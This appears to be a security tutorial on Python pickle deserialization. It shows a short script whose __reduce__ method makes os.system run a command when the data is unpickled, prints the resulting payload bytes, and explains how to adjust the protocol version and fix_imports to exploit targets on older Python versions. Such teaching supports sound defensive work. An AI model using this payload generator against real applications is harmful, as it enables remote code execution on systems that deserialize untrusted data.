Python Pickles

In Python, an object can be converted into a stream of bytes to allow for moving the object between environments or processes, this is known as serialization and deserialization. The Pickle library can be used in Python for this purpose, however, this is an insecure method that can allow an attacker to obtain remote code execution (RCE) on the target host.

The documentation includes a warning that points to this situation and pointing to the serialized data being processed only for trusted sources

Warning: The pickle module is not secure. Only unpickle data you trust. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling.

There is a difference between how the object is serialized in Python 2 and Python 3, which can present an issue when dealing with applications that use the deprecated Python 2 version. However, the Pickle library in Python 3 is capable of generating a Python 2 compatible serialized object that can be used to generate the payload for these scenarios.

The following Python 3 script creates a serialized object

#!/usr/bin/env python3

import os
import pickle

class RCE(object):
    def __init__(self,cmd):
        self.cmd = cmd
    
    def __reduce__(self):
        return (os.system, (self.cmd,))

print(pickle.dumps(RCE(b"uname -a")))

The output of the script above is shown below

\x80\x04\x95#\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94C\x08uname -a\x94\x85\x94R\x94.

The latest version of the protocol is 5, however, in Python 3.8 the default version of the protocol used is 4. This can be checked with pickle.DEFAULT_PROTOCOL and the highest protocol version available can be checked with pickle.HIGHEST_PROTOCOL. The output shown above is for protocol version 4, however, it would be the same if it was version 5.

Below is the output of each protocol version for the same object mentioned in the script above

The protocol versions 0 through 2 can be deserialized by Python 2, while the versions 3 through 5 can only be deserialized by Python 3. This aspect is important, since if the target application uses an older version of Python, then it is necessary to adjust the script to generate the respective payload.

Specifying which protocol version to use can be done by adding the number after the object in the dumps function or by using the protocol= argument, as shown below

pickle.dumps(RCE(b"uname -a"), 1)
pickle.dumps(RCE(b"uname -a"), protocol=1)

The other argument that will generate a different serialized object is fix_imports=, which will translate the module names in the serialized object when the version is lower than 3 so that they match the module names on Python 2. However, this may cause for the module name to not match the one used on the target system, meaning that it may be necessary to set this argument to False. In the sample output above, this was not needed as the same module name was used, however, in the sample below the output does vary due to the module being named differently

The only difference being the module name subprocess being changed to commands. If the protocol version is set to 3 or higher, the fix_imports= argument doesn't have any effect on the output.

The loads function will determine the protocol version prior to deserializing the data provided, this means that when attempting to exploit a vulnerable application, start lowering the version of the protocol if the payload fails and include the fix_imports argument as part of the testing as well.